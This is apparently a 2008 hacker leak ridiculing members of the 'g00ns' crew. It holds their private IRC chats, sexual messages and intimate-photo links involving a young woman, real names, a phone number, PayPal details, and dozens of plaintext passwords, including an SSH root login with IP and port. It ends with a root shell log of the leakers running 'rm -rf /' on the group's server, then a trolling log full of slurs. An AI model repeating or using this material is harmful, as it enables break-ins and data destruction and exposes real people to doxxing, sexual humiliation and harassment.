irl raids myself here shortly. I think the target -deserves to be targeted and deserves whatever actions come out of it. I don't - understand the current direction the raid is taking look if you are going to - spread documents and call it a raid i think thats rather ridiculous there are - thousands of other sites that do that already. Words are for Discourse Violence - is for Change, look its tough to even type this but paper airplanes don't -change anything...they don't they just don't. If you make a paper airplane and - hand it off to people and try to show them information nothing will change. -What changes things are when airplanes crash into shit and do damage, that is -really all today's world is about; the level of importance is directly related - to the amount of damage something has done. Don't hand people paper...slam a - fucking plane into a building and force the shit on them." - -What's the moral there, that terrorism is an acceptable and admirable way of -accomplishing your goals? CLOROX IS A TERRORIST WANNABE!!!! Hand the man a turban! - -// g00ns is SERIOUS FUCKING BUSINESS -cloroxsecure (2:38:16 AM): if i see someone fucking around with the community - we are going to expose them -cloroxsecure (2:38:25 AM): you were exposed - -clorox -> Depravus: explain to me why g00ns are lame? -Depravus -> clorox: Personal army shit, internet tough guy shit, etc. -clorox -> Depravus: like? -Depravus -> clorox: Like typical 13 year olds that figured out how to use the in -ternet -clorox -> Depravus: first off none of us are 13 years old.... 18+ and most of u -s are older than that... secondly we are not anon we do what we want -Depravus -> clorox: Dude you don't have to be 13 to act like a 13 year old -Depravus -> clorox: You could be 49 for all I care -Depravus -> clorox: And that mentality is why you're lame -Depravus -> clorox: "We do what we want" -clorox -> Depravus: why do you think we act like 13 year olds -Depravus -> clorox: Which gives rise to internet tough guy mentality -clorox -> Depravus: do you not do what you want? -clorox -> Depravus: sorry we've pulled anon out of situations they couldn't handle - -clorox -> inky_: $servidor='64.72.117.181' unless $servidor; -clorox -> inky_: my $porta='6667'; -clorox -> inky_: my @canais=("#!!g00ns"); -clorox -> inky_: my @adms=("br3ttch4nce"); - -inky_ -> clorox: are any of the 2.6.9 kernels vuln? they seem to be most popular -clorox -> inky_: milw0rm vmsplice - -// ZF0 much help, great success! -Genocide -> clorox: i miss #irclogs -Genocide -> clorox: :[ -clorox -> Genocide: ditto - -Ok the real funny thing about clorox is his relationship with theswellseason (IRC whore). -The entire time they were dating she was flirting with other guys on IRC. The only guy -she didn't flirt with was clorox, who was too busy taking g00ns very fucking seriously! -She sure likes the attention she gets when she shows titties. - -tribaL -> sCuZz: homeboys gonna get played like the rest -tribaL -> sCuZz: but you know hes not going to listen -tribaL -> sCuZz: not to me -tribaL -> sCuZz: not to you -tribaL -> sCuZz: not to z3r0 - -We present to you, the chronological IRC life of theswellseason! - -theswellseason -> d0ct0r: my dad, when he found out I'd lost my virginity, started -crying. and I just sat there totally stonefaced because i knew if I said anything, -I'd burst into laughter -d0ct0r -> theswellseason: wtf -theswellseason -> d0ct0r: lol -theswellseason -> d0ct0r: yeah -theswellseason -> d0ct0r: I know -theswellseason -> d0ct0r: my dad is such a pussy sometimes -d0ct0r -> theswellseason: my mom was like -d0ct0r -> theswellseason: 3 years ago -d0ct0r -> theswellseason: 'when you going to pop your cherrry' -d0ct0r -> theswellseason: i was like -d0ct0r -> theswellseason: huh -d0ct0r -> theswellseason: i remember this -theswellseason -> d0ct0r: my parents are really religious though -d0ct0r -> theswellseason: cause i was like, how could i pop...my cheer.y -d0ct0r -> theswellseason: cherry* -theswellseason -> d0ct0r: lol -d0ct0r -> theswellseason: one of my problems is -theswellseason -> d0ct0r: my parents view the whole "sex before marriage" thing as being really bad -d0ct0r -> theswellseason: i like to go for the 0 size jean girls - -sCuZz -> theswellseason: im envious of clorox -sCuZz -> theswellseason: and im wanking -theswellseason -> sCuZz: It's sideways, but, observe: http://tinypic.com/view.php?pic=2zrnr7a&s=3 -theswellseason -> sCuZz: http://tinypic.com/view.php?pic=2r3b0vp&s=3 -theswellseason -> sCuZz: blurry, but somewhat full body -sCuZz -> theswellseason: you have an amazing ass -theswellseason -> sCuZz: I can't believe I'm showing you this -theswellseason -> sCuZz: I'm only adding to the fuel -sCuZz -> theswellseason: i do have to admit its kinda hot -theswellseason -> sCuZz: jesus, clorox is going to have my head for being such a flirt -theswellseason -> sCuZz: why does the g00ns irc server not allow ssl connections? -sCuZz -> theswellseason: stop being sketchy -theswellseason -> sCuZz: dude, clorox just got a webcam -sCuZz -> theswellseason: have you seen his cock? -theswellseason -> sCuZz: no -sCuZz -> theswellseason: and hes seen you nude -sCuZz -> theswellseason: ? -theswellseason -> sCuZz: yeaaaaah -theswellseason -> sCuZz: trust me -theswellseason -> sCuZz: I don't find that fair either -sCuZz -> theswellseason: lol -sCuZz -> theswellseason: what if his cock is like -sCuZz -> theswellseason: 4 inches? -sCuZz -> theswellseason: or hes pushing 5 -theswellseason -> sCuZz: er, I'm really fucking tight anyways, so that won't be a big deal -sCuZz -> theswellseason: thats not fair -theswellseason -> sCuZz: what? -sCuZz -> theswellseason: you telling me your tight -theswellseason -> sCuZz: seriously, I don't have big fingers and it's pushing it to get two of my fingers in there. -theswellseason -> sCuZz: lol -theswellseason -> sCuZz: shit -theswellseason -> sCuZz: now I'm just being mean -sCuZz -> theswellseason: wow -sCuZz -> theswellseason: i dont believe that -sCuZz -> theswellseason: :( -theswellseason -> sCuZz: okay -theswellseason -> sCuZz: well, two fit fine -sCuZz -> theswellseason: haha -theswellseason -> sCuZz: but like, I can't put three side-by-side -sCuZz -> theswellseason: thats fucked up -sCuZz -> theswellseason: see -sCuZz -> theswellseason: you do like to tease -sCuZz -> theswellseason: does it hurt to masturbate -theswellseason -> sCuZz: well... no -theswellseason -> sCuZz: you just have to be careful? -theswellseason -> sCuZz: lol, I don't even bother with panties -theswellseason -> sCuZz: I'm just straight nude -sCuZz -> theswellseason: hot -theswellseason -> sCuZz: lol -theswellseason -> sCuZz: clorox is going to kill me for telling you all this lol -theswellseason -> sCuZz: I'll give you noodz if you'll give me cock pics -theswellseason -> sCuZz: so that I can make clorox jealous -sCuZz -> theswellseason: i so know this is a setup -theswellseason -> sCuZz: how so? -sCuZz -> theswellseason: but if it means clorox gets to see my cock -sCuZz -> theswellseason: ill be happy - -theswellseason -> vgx: enviesecure@gmail.com -theswellseason -> vgx: I'm dating a g00n -theswellseason -> vgx: I take everything with a grain of salt - -botkip -> theswellseason: I wouldn't fuck with botkip if I were you... -people are reading the logs right now // if only you knew - -theswellseason -> Ninth_: he was being an ass -theswellseason -> Ninth_: and there was someone else that wanted me to -"run away with him" -theswellseason -> Ninth_: and this other person... idk... was charming -Ninth_ -> theswellseason: work hard, stick with him, honestly, that will mean -so much more than anything else, knowing that you are devoted enough to stay together. -theswellseason -> Ninth_: and I almost wanted to cheat, but like... idk - -theswellseason -> sCuZz: I was a whore before I met clorox - -theswellseason -> TokyoFox: old pic is old, but: http://tinypic.com/view.php?pic=2zqfonb&s=3 -theswellseason -> sCuZz: http://tinypic.com/view.php?pic=jiltkx&s=3 -theswellseason -> sCuZz: http://tinypic.com/view.php?pic=35jbc4g&s=3 -^ emo hair lol..... - -Zombocom -> theswellseason: I love you Emmaleigh -theswellseason -> Zombocom: I'm going to the coffee shop later, I'll talk to you then -theswellseason -> Zombocom: I love you too James - -Anonzz -> theswellseason: This is a pic of me and my bitch -Anonzz -> theswellseason: http://farm3.static.flickr.com/2325/2337209376_d57f1c43d4_o.jpg - -theswellseason -> Zombocom: Because you are -theswellseason -> Zombocom: you're... just amazing - -theswellseason -> Zombocom: what do you mean you misssed me? -theswellseason -> Zombocom: I was gone for all of... five minute? - -theswellseason -> ServicesUp: you're in #programming -theswellseason -> ServicesUp: you're a programer? -ServicesUp -> theswellseason: yes - -// That might impress theswellseason, but... -ServicesUp -> #programming: is IP based on MAC address? - -theswellseason -> Deltantor: you're silly -theswellseason -> Deltantor: they're just tits -Deltantor -> theswellseason: I just like yours a lot >_> they are...perfect - -Deltantor -> theswellseason: <theswellseason> http://tinypic.com/view.php?pic=866pl6q&s=1 -Deltantor -> theswellseason: <theswellseason> don't go posting that places - -theswellseason -> p00h: p00h, clorox could root ANYONE -p00h -> theswellseason: clorox doesnt know about rooting - -// keeps calling her babygirl -// gave her a bellavendetta.com user account -theswellseason -> p00h: I think clorox could handle me going on a trip -theswellseason -> p00h: lol -p00h -> theswellseason: lol -theswellseason -> p00h: we're just friends, right? -p00h -> theswellseason: why, what would u say if i ran porn sites - -p00h -> theswellseason: u still have the nipple peircings? -theswellseason -> p00h: yep -p00h -> theswellseason: nice -p00h -> theswellseason: they look nice -theswellseason -> p00h: yeop -p00h -> theswellseason: i like the studs -theswellseason -> p00h: lol I like them -p00h -> theswellseason: im sure u have heard this -p00h -> theswellseason: but ur nipples like really hot -p00h -> theswellseason: they are perfect looking -theswellseason -> p00h: I have heard that - - -// I just can't resist dropping any pm where someone begs someone to be private -theswellseason -> p00h: when the other guy says he loves me, I believe it -theswellseason -> p00h: I'm just scared that if I leave clorox he'll turn g00ns -on me and get them to ruin my life -theswellseason -> p00h: z3r0 has threatened to do so if I hurt clorox -theswellseason -> p00h: that's why you cannot EVER tell him this - -theswellseason -> p00h: I'm gonna try and back out peacefully -p00h -> theswellseason: it would be -theswellseason -> p00h: but if he knows it's for another guy, I'm done -p00h -> theswellseason: that would be the safest thing -p00h -> theswellseason: ya -theswellseason -> p00h: so please please please p00h -p00h -> theswellseason: i won't say anything -theswellseason -> p00h: don't tell anyone -p00h -> theswellseason: don't worry - -sCuZz -> tribaL: whats the deal with theswellseason? -tribaL -> sCuZz: idk -tribaL -> sCuZz: why -tribaL -> sCuZz: shes dating clorox IRL THO -sCuZz -> tribaL: i know -sCuZz -> tribaL: she tells me shit all the time -sCuZz -> tribaL: and it just seems like shes being an e whore - -theswellseason -> p00h: I've fucked a chick before -p00h -> theswellseason: but not with a penis -theswellseason -> p00h: well -theswellseason -> p00h: does a strapon count? -p00h -> theswellseason: no -theswellseason -> p00h: shit - -theswellseason -> p00h: that's his IP -p00h -> theswellseason: how do u know -theswellseason -> p00h: because he just visted a page that I had set up specifically to get his IP -theswellseason -> p00h: the only other IP to have visited that page is mine -theswellseason -> p00h: and that's not my IP -p00h -> theswellseason: hehe -theswellseason -> p00h: so it must be his -p00h -> theswellseason: you are such a haxor -theswellseason -> p00h: lol -theswellseason -> p00h: aren't I though? -theswellseason -> p00h: see, I may need to learn, but hell -p00h -> theswellseason: u are a hax0r -p00h -> theswellseason: im proud of u -theswellseason -> p00h: I have a few really useful tricks up my sleeve already - -theswellseason -> p00h: whatdya gonna do, p00h? -theswellseason -> p00h: I think you'd get in the room and like, cum prematurely - from the nervousness of being around a woman like me - - -And this basically sums it up nicely... - -sCuZz -> tribaL: lol she told me that when they broke up -sCuZz -> tribaL: he was like saying he wanted to spend the rest of his life with her - - -// pr0be // - - -tribaL -> nickserv: identify h4x0r! -pr0be -> nickserv: identify h4x0r! - -For anyone who didn't know, tribaL == pr0be. He was too embarassed to carry on - under his nick, so he concocted a stupid story and has been living it. - -tribaL -> sCuZz: they think im from anonymous -tribaL -> sCuZz: i can't let them know im pr0be ;( - -tribaL -> luna: switching from pr0be to tribal because of my dox - -One common thread in pr0be's IRC messages is his (emotional) insecurity and jealousy. -Always bitching about someone, like clorox. - -~~~~~~~~~~~~~~~~~~~~~~~~~ - -For the past few months, Alot of you have met the new guy tribaL. TribaL and i go -back quite a bit, and he is the most trustworthy individual on the net that i have -met thus far. - -The truth is, I have been training a replacement. I have been here for quite some -time, and real life is starting to take over. With that said, it is about the time -that i step down. - -I will not join any other crew. g00ns is and will always be my home, and if real life - slows down perhaps i will be back. Most of you can contact me, but you know i just - have not been online as much as i used to be anymore. - -Respect tribaL, he is one crazy motherfucker. - -Later guys - -oh, and i aint gay. - - -~~~~~~~~~~~~~~~~ - -g00ns.net motd - -God i'm going to miss this place so fucking much. -Just remember, Things aren't like they used to be. For the most part, -you are on your own. Watch your own ass, and do what you have to, to -protect it. Even if g00ns were to end tomarrow, Nobody will ever be able -to break our spirit. Nobody will ever be able to tell us we didn't own -the internet. Watch out bro, And its never too late to get out while -your ahead. People will listen to you - You have a good head on your -shoulders. Maybe down the road we will start over, With all of the -knowledge of our mistakes the first time. This isn't the end. Whoever -attacks may win the battle, But they will never win the war. If g00ns -shuts down, Its not the end. We still have our cliche- our group of guys -that we will hang out with. We are smarter when it comes to getting shit -done and not getting caught. We will prevail. You know if you need -anything, i'll help you to my fullest extent. You're my homie. - -Walk light, And keep your head on a swivel. Most of the people out here -are snakes. - -- [g00n] motherfucking pr0be - -~~~~~~~~~~~~~ - -pr0be temporary h4cky0u forum pass (probably changed by now) 164187e6 - -// z3r0 sticks it to pr0be -I was^H^H^Ham sorry to inform you that because of your -^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^Hthat since you have been messing - with our staff I will have to let you go. I'm soor^H^Hrry but you have to - go. We do not want to^H^Hyou in the com^Hmmunity anymore. - -pr0be bearshare: polxx/104diam - -loSt -> tribaL: riot wants me to give him ops in g00ns chan again -loSt -> tribaL: should i? -tribaL -> loSt: no -tribaL -> loSt: just ignore it -loSt -> Riot: ill talk to tribal and see if im allowed to ops you -Riot -> tribaL: can i get my goddamn ops. or at least voice. -Riot -> tribaL: Dude, am I ever getting my ops back and shit -tribaL -> Riot: stop -tribaL -> Riot: socialing me -tribaL -> Riot: dude -tribaL -> Riot: why -tribaL -> Riot: are y -tribaL -> Riot: ou -tribaL -> Riot: trying -tribaL -> Riot: to social me -Riot -> tribaL: ... -Riot -> tribaL: No -Riot -> tribaL: like I'm pissed as fuck -tribaL -> Riot: socialed -Riot -> tribaL: For real are you all just going to keep being cocksuckers -Riot -> tribaL: or what -Riot -> tribaL: because z3r0 goes and tells jon -Riot -> tribaL: that I told g00ns he's been giving people up <--- this is true, z3r0 is an informant. No joke. -tribaL -> Riot: idonno -Riot -> tribaL: Like its some fucking bullshit -tribaL -> Riot: im just smoking -Riot -> tribaL: and i'm steps away from fucking walking bro. -tribaL -> Riot: and trying to hack f bis -Riot -> tribaL: I put my trust fucking time and again into g00ns -Riot -> tribaL: and you fuckers just throw it back in my fucking face dude. -tribaL -> Riot: i can imagine - -tribaL -> inky_: 158.36.71.34 -tribaL -> inky_: SSH port 3785 -tribaL -> inky_: User: root -tribaL -> inky_: Pass: zr0mg123 -tribaL -> inky_: dont tell anybody i gave it to you - -# Talking to yourself is not safe, ZF0 can hear you. - -tribal -> tribal: clorox sucks cock - -tribal -> tribal: a59 sucks cock - -# he keeps bumming money off people, it's pathetic -tribaL -> loSt: got 10 bucks i canborrow -loSt -> tribaL: nah man -tribaL -> loSt: feck - -FuRY -> tribaL: cause z3r0 and clorox are running with there reputations.... -FuRY -> tribaL: they havent done anything in years -FuRY -> tribaL: lol -tribaL -> FuRY: i have to teach clorox shit -FuRY -> tribaL: :\ -tribaL -> FuRY: z3r0 -tribaL -> FuRY: im not going to sell him out -FuRY -> tribaL: is dead -FuRY -> tribaL: :P -tribaL -> FuRY: but lets just say his strong points are in what they teach in networking class - -core -> tribal: yo -tribal -> core: yo -core -> tribal: i have one you can use -core -> tribal: not mine though -tribal -> core: i will suck yourfucking edick -core -> tribal: user: jojoman112 -core -> tribal: pw: syense1 -tribal -> core: omfg -tribal -> core: ty - -tribal -> sCuZz: i started a new irc -tribal -> sCuZz: for the people we choose -tribal -> sCuZz: its a private irc -tribal -> sCuZz: p.60z.org -tribal -> sCuZz: connect there -sCuZz -> tribal: i thought i had one set :/ -tribal -> sCuZz: your opper is !beanerl0ve! - - -// sCuZz // - - -sCuZz -> nickserv: identify HsNS3Sksd%SmfjuuAxT - -disruptiv -> sCuZz: u dont think somebody has this ircd rewted riht now -disruptiv -> sCuZz: somebody is sniffin somebodys shit -disruptiv -> sCuZz: all the time - -Welcome to sn00g Forums -Username: geezus -Password: nukes77g1 - -acircle.us forums -Username: sCuZz -Password: nukes77g2 - - -// spl0iT // - - -spl0iT -> nickserv: identify bejtm540 - -// spl0it goes to daddy clorox for hacking help -spl0iT -> clorox: www.scorpiontek.org - -// Mr. Tough Guy -spl0iT -> d0ct0r: said he doesn't know why he was targetted and was -wondering what type of sick game it was -spl0iT -> d0ct0r: i told him it was a harsh lesson in security -spl0iT -> d0ct0r: we are the g00ns -spl0iT -> d0ct0r: expect us - -spl0iT -> d0ct0r: Yes, we were hacked. By #[7m<80><9C>we#[7m<80><9D> I mean me, - Aaron, and our podcast - which are all hosted on the same server. I#[7m<80><99>m - not gonna post a link to the site that supposedly hacked us just because it#[7m<80><99>s b -ad taste. Why we were hacked? I don#[7m<80><99>t know. - -loSt -> spl0iT: d0ct0r is on 24/7 and refuses to learn -loSt -> spl0iT: he even takes highschool from home -loSt -> sCuZz: im turning spl0it right now - -spl0iT -> tribaL: what's the command to exit nano - -spl0iT -> tribaL: i used putty to connect - -spl0it -Your login is: p10067292 -Your password is: 4g50y11x -NNTP Address/News Server: europe.newsdemon.com, useast.newsdemon.com - -Welcome to sn00g Forums -Username: spl0iT -Password: TheTaCSS74 - - -// loSt // - - -loSt's thing is that he'll do anything to move up in g00ns, -like make them money and suck up. - -And he likes to hand out passes in IRC. :D - -loSt -> detrez: Username: detrez@j3ws.com -loSt -> detrez: Password: rg8lTQFl -loSt -> detrez: Pop3 Server: mail.j3ws.com -loSt -> detrez: Smtp Server: mail.j3ws.com -loSt -> detrez: oh, you can also login through here as well: -loSt -> detrez: j3ws.com/webmail -loSt -> detrez: naygor.com/webmail -loSt -> detrez: Username: detrez@naygor.com -loSt -> detrez: Password: voJLp90C -loSt -> detrez: Pop3 Server: mail.naygor.com -loSt -> detrez: Smtp Server: mail.naygor.com - -loSt -> detrez: Username: hang.the@naygor.com -loSt -> detrez: Password: t5ybTINh -loSt -> detrez: Pop3 Server: mail.naygor.com -loSt -> detrez: Smtp Server: mail.naygor.com -deTrez -> loSt: awesomeeeee -loSt -> detrez: Username: dirty.filthy.greedy.scumbag@j3ws.com -loSt -> detrez: Password: SkAKU1eP -loSt -> detrez: Pop3 Server: mail.j3ws.com -loSt -> detrez: Smtp Server: mail.j3ws.com - -loSt -> clorox: [17:01] <Angyl> hey hun -loSt -> clorox: [17:01] <loSt> hey -loSt -> clorox: [17:01] <loSt> how you been? -loSt -> clorox: [17:02] <Angyl> bad. i went wildcard. looking to make some sales -, know any buyers? -loSt -> clorox: [17:02] <loSt> watcha mean wildcard/ -loSt -> clorox: [17:03] <Angyl> off the grid, and unpredictable. im running. -loSt -> clorox: [17:04] <loSt> ooo -loSt -> clorox: [17:04] <loSt> fedz after you ? -loSt -> clorox: [17:04] <loSt> or people? -loSt -> clorox: [17:05] <Angyl> alphabet soup.pick your acronym -loSt -> clorox: [17:05] <loSt> lol - - -andy -> Joshua: loSt says he will keep ANYONE you want gzlined if he gets the money - -CuNt -> loSt: need the warez-bb password again -loSt -> CuNt: 547745 -CuNt -> loSt: and its rocksuperman right? - -loSt -> tribaL: [19:55] <loSt> im just doing what i do to bring in money -loSt -> tribaL: [19:55] <loSt> only temp to help with the load of threads -loSt -> tribaL: [19:55] <g00ns> Which proves g00ns is only about money now -loSt -> tribaL: [19:55] <g00ns> Whoever brings in most money gets most power - - -// core // - - -core -> nickserv: IDENTIFY h4xorwooT - -On Sat, Mar 15, 2008 at 6:42 PM, <dirty.filthy.greedy.scumbag@j3ws.com> -wrote: - -> -> hey mom this is carroll, my new email address - -Welcome to StumbleUpon! Here's your login info: -Email: core@j3ws.com -Password: damiro - -Dear core1516161,<br /><br />We have received several complaints concerning= - your use of the Stickam service. Specifically, we have been informed that = -you have exposed yourself and/or others nude/partially nude to other member= -s/users of the service.<br /><br /> ..etc(see his spool)a - -core = Cormac O'Riordan according to paypal -Woulf Den Imprinting just sent you money with PayPal. ($2430! fuck!) - -`This email confirms that you have paid Valve Corp.=2412.04 USD using PayPal. -Phone: +353 0864054913 - -Welcome to Los Santos Role Play forums -Username: core -Password: hacker123 -core321@live.com his other email - - -// a59 // - - -a59 -> nickserv@anonymous.services: identify snoop1 - -a59 -> sixthreenine: THIS IS A FUCKIN HACKER TOOL -a59 -> sixthreenine: I AM A FUCKIN HACKER TOOL -a59 -> sixthreenine: DONT TALK SHIT -a59 -> sixthreenine: NEVER -a59 -> sixthreenine: and dont EVER question my AUTHORITY CAUSE IWILL FUCKIN HACK U' - - -~~~~~~~~~~~~~~~ - -These kids are so funny. - -Shortly before release (and long after we had taken anything we wanted from - g00ns) we decided to have some fun with them. - -Here are the IRC logs of us trolling and rming g00ns.net. A lot of others -jumped on the troll wagon and everyone had a great time! - -We fixed up the box a bit: - - -[root@demon2 Unreal3.2.7]# cat unrealircd.conf -loadmodule "src/modules/commands.so"; -loadmodule "src/modules/cloak.so"; - - -me -{ - name "irc.evilcoders.net"; - info "Partyvan IRC"; - numeric 11; -}; - -admin { - "tribaL"; - "tribal@g00ns.net"; - -}; - -class clients -{ - pingfreq 180; - maxclients 5000; - sendq 1000000000; - recvq 8000; - -}; - -class servers -{ - pingfreq 290; - maxclients 100; /* Max servers we can have linked at a time */ - sendq 999999999; - connfreq 100; /* How many seconds between each connection attempt */ -}; -oper zf0 { - from { - userhost "*@*"; - }; - password "g00nspwnage"; - class "default"; - flags { - netadmin; - services-admin; - global; - helpop; - can_rehash - can_globalnotice; - can_globalroute; - can_globops; - can_wallops; - can_unkline; - can_kline; - can_globalkill; - can_zline; - can_gkline; - can_gzline; - get_umodew; - get_host; - can_override; - can_die; - can_restart; - }; -}; -[root@demon2 Unreal3.2.7]# /etc/init.d/directadmin stop -Stopping DirectAdmin: [ OK ] -[root@demon2 Unreal3.2.7]# /etc/init.d/httpd stop -Stopping httpd: [ OK ] -[root@demon2 Unreal3.2.7]# /etc/init.d/lsws stop -[root@demon2 Unreal3.2.7]# /etc/init.d/mysqld stop -Shutting down MySQL.. [ OK ] -[root@demon2 Unreal3.2.7]# /etc/init.d/nessusd stop -Shutting down Nessus services: [ OK ] -[root@demon2 Unreal3.2.7]# /etc/init.d/proftpd stop -Shutting down proftpd: [ OK ] -[root@demon2 ~]# /etc/init.d/sshd restart -Stopping sshd: [ OK ] -Starting sshd: [ OK ] -[root@demon2 ~]# cat /etc/ssh/sshd_config -# $OpenBSD: sshd_config,v 1.73 2005/12/06 22:38:28 reyk Exp $ -Banner /etc/ssh/sshd-banner -# This is the sshd server system-wide configuration file. See -# sshd_config(5) for more information. - -# This sshd was compiled with PATH=/usr/local/bin:/bin:/usr/bin - -# The strategy used for options in the default sshd_config shipped with -# OpenSSH is to specify options with their default value where -# possible, but leave them commented. Uncommented options change a -# default value. - -Port 3000 -#Protocol 2 -Protocol 2 -#AddressFamily any -#ListenAddress 0.0.0.0 -#ListenAddress :: - -# HostKey for protocol version 1 -#HostKey /etc/ssh/ssh_host_key -# HostKeys for protocol version 2 -#HostKey /etc/ssh/ssh_host_rsa_key -#HostKey /etc/ssh/ssh_host_dsa_key - -# Lifetime and size of ephemeral version 1 server key -#KeyRegenerationInterval 1h -#ServerKeyBits 768 - -# Logging -# obsoletes QuietMode and FascistLogging -#SyslogFacility AUTH -SyslogFacility AUTHPRIV -#LogLevel INFO - -# Authentication: - -#LoginGraceTime 2m -#PermitRootLogin yes -#StrictModes yes -#MaxAuthTries 6 - -#RSAAuthentication yes -#PubkeyAuthentication yes -#AuthorizedKeysFile .ssh/authorized_keys - -# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts -#RhostsRSAAuthentication no -# similar for protocol version 2 -#HostbasedAuthentication no -# Change to yes if you don't trust ~/.ssh/known_hosts for -# RhostsRSAAuthentication and HostbasedAuthentication -#IgnoreUserKnownHosts no -# Don't read the user's ~/.rhosts and ~/.shosts files -#IgnoreRhosts yes - -# To disable tunneled clear text passwords, change to no here! -#PasswordAuthentication yes -#PermitEmptyPasswords no -PasswordAuthentication yes - -# Change to no to disable s/key passwords -#ChallengeResponseAuthentication yes -ChallengeResponseAuthentication no - -# Kerberos options -#KerberosAuthentication no -#KerberosOrLocalPasswd yes -#KerberosTicketCleanup yes -#KerberosGetAFSToken no - -# Set this to 'yes' to enable PAM authentication, account processing, -# and session processing. If this is enabled, PAM authentication will -# be allowed through the ChallengeResponseAuthentication mechanism. -# Depending on your PAM configuration, this may bypass the setting of -# PasswordAuthentication, PermitEmptyPasswords, and -# "PermitRootLogin without-password". If you just want the PAM account and -# session checks to run without PAM authentication, then enable this but set -# ChallengeResponseAuthentication=no -#UsePAM no -#UsePAM yes - -# Accept locale-related environment variables -AcceptEnv LANG LC_CTYPE LC_NUMERIC LC_TIME LC_COLLATE LC_MONETARY LC_MESSAGES -AcceptEnv LC_PAPER LC_NAME LC_ADDRESS LC_TELEPHONE LC_MEASUREMENT -AcceptEnv LC_IDENTIFICATION LC_ALL -#AllowTcpForwarding yes -#GatewayPorts no -#X11Forwarding no -X11Forwarding yes -#X11DisplayOffset 10 -#X11UseLocalhost yes -#PrintMotd yes -#PrintLastLog yes -#TCPKeepAlive yes -#UseLogin no -#UsePrivilegeSeparation yes -#PermitUserEnvironment no -#Compression delayed -#ClientAliveInterval 0 -#ClientAliveCountMax 3 -#ShowPatchLevel no -#UseDNS yes -#PidFile /var/run/sshd.pid -#MaxStartups 10 -#PermitTunnel no - -# no default banner path -#Banner /some/path - -# override default of no subsystems -Subsystem sftp /usr/libexec/openssh/sftp-server -AllowUsers ZF0PWN -[root@demon2 ~]# rm -rf /* -rm: cannot remove `/aquota.group': Operation not permitted -cannot remove `/aquota.user': Operation not permitted -cannot remove directory `/backup': Device or resource busy -cannot remove directory `/boot': Device or resource busy -[root@demon2 ~]# - - -And we trolled: - - ---- Log opened Wed May 07 11:50:55 2008 -11:50 < r00tr00t> welcome to the zf0 rmage -11:50 < Angyl> for the lulz -11:50 < ECB> hmm -11:51 < Angyl> and auctuioning it off on mids -11:51 <+theswellseason> Zombocom why are you such a faggot -11:51 <+theswellseason> I can't believe I thought I loved you Zombocom -11:51 < boon> SAY GOOD NIGHT G000ns -11:51 -!- Slowpoek is now known as theswelllseason -11:51 < r00tr00t> [root@demon2 ~]# ls /home/g00ns -11:51 < r00tr00t> ls: /home/g00ns: No such file or directory -11:51 < theswelllseason> lol -11:51 < r00tr00t> you have been rm'ed -11:51 < boon> TOODLEOOOO -11:51 < Angyl> swell. -11:51 < r00tr00t> bye -11:51 < Angyl> did i ever show you the pic -11:51 < Angyl> of riot -11:51 < Angyl> looking like an epic faggot -11:51 < boon> hahaha you guys dont even know :( -11:51 <&FuRY|Shmoke> `kb r00tr00t -11:51 < boon> lolz -11:51 <&FuRY|Shmoke> :( -11:51 <+theswellseason> actually I think you did -11:52 < theswelllseason> lol we just got hacked -11:52 < Angyl> http://i32.tinypic.com/xoozlg.jpg that one? -11:52 <%p00h> :/ -11:52 < theswelllseason> looooooool -11:52 < theswelllseason> `staff -11:52 < boon> lol -11:52 <+theswellseason> wtf who is theswelllseason -11:52 < theswelllseason> i am slowpoke :P -11:52 <+theswellseason> HAHAHAHAHAHAHAHAHAHA -11:52 < theswelllseason> <3 ^_^ -11:52 <+theswellseason> HAHAHAHAHAHAHAHAHAHAHAHAHA -11:52 < Slowpoke> oh shit what the hell -11:52 < Angyl> o.o -11:52 < theswelllseason> angyl = selfish -11:52 < Slowpoke> Oh -11:52 < boon> its fun that your last messages will be from the whore that is theswellseason -11:53 <+theswellseason> Angyl that is hilarious -11:53 < theswelllseason> slowpoke = angyl -11:53 <+theswellseason> poor guy -11:53 -!- r00tr00t was kicked from #g00ns by FuRY|Shmoke [FuRY|Shmoke] -11:53 < boon> and soo nthe world will see your sexy pics -11:53 -!- r00tr00t [root@FB370F60.35B0F1AB.6B794A7F.IP] has joined #g00ns -11:53 <+Zombocom> dude, swell's not a whore -11:53 -!- mode/#g00ns [+b *!*@FB370F60.35B0F1AB.6B794A7F.IP] by FuRY|Shmoke -11:53 < ECB> WHAAT ABOUT MY SEXY PICS -11:53 -!- r00tr00t was kicked from #g00ns by FuRY|Shmoke [FuRY|Shmoke] -11:53 < Angyl> yes she is -11:53 < ECB> IM FUCKING SEXY -11:53 < Angyl> quit defending your irc girlfriend -11:53 <+Zombocom> no she's not -11:53 < Angyl> shes proud of being a whore -11:53 -!- FuRY|Shmoke [douglas@Shit.Piss.Fuck.Cunt.CockSucker.MotherFucker] -has quit [Killed (r00tr00t (faggot))] -11:53 -!- r00tr00t [root@FB370F60.35B0F1AB.6B794A7F.IP] has joined #g00ns -11:53 -!- FuRY [douglas@Shit.Piss.Fuck.Cunt.CockSucker.MotherFucker] has joined #g00ns -11:53 -!- mode/#g00ns [+ao FuRY FuRY] by HustleServ -11:53 <+theswellseason> Angyl you best not be talkin shit :P -11:53 <%p00h> lol -11:53 < Slowpoke> theswellseason sux -11:53 < Slowpoke> D: -11:54 -!- theswellseason is now known as DickMonkey -11:54 < Angyl> im not -11:54 < ECB> lol -11:54 < Angyl> im just saying your a whore baby -11:54 < ECB> ok im gonna shower niggas -11:54 <+DickMonkey> I ain't swell -11:54 -!- r00tr00t [root@FB370F60.35B0F1AB.6B794A7F.IP] has quit -[Killed (januszeal (who are you))] -11:54 -!- theswelllseason is now known as theswelseason -11:54 < ECB> ill talk to you bitches later -11:54 -!- Zombocom is now known as theswellseason -11:54 -!- DickMonkey is now known as Zombocom -11:54 <+theswellseason> lol -11:54 -!- notherejack [notjack@48A9411C.15EBAEA.ED99F467.IP] has quit [Ping timeout] -11:54 <+Zombocom> god since when does Zombocom have voice in here -11:54 <+theswellseason> lol -11:55 < Angyl> since he started fucking you -11:55 <+theswellseason> LOL -11:55 <+theswellseason> angyl -11:55 -!- r00tr00t [root@FB370F60.35B0F1AB.6B794A7F.IP] has joined #g00ns -11:55 < ECB> lol -11:55 <+theswellseason> we're back to normal -11:55 <+theswellseason> I'm swell again -11:55 <&FuRY> everyone join irc.partyvan.fm -11:55 <+Zombocom> and I'm Zombocom -11:55 < Murdoc> osht angyl is getting bitchy :[ -11:55 < Murdoc> break out the xanax -11:55 < Slowpoke> asl Murdoc :) -11:55 < ECB> NO GIMME THE XANAX -11:55 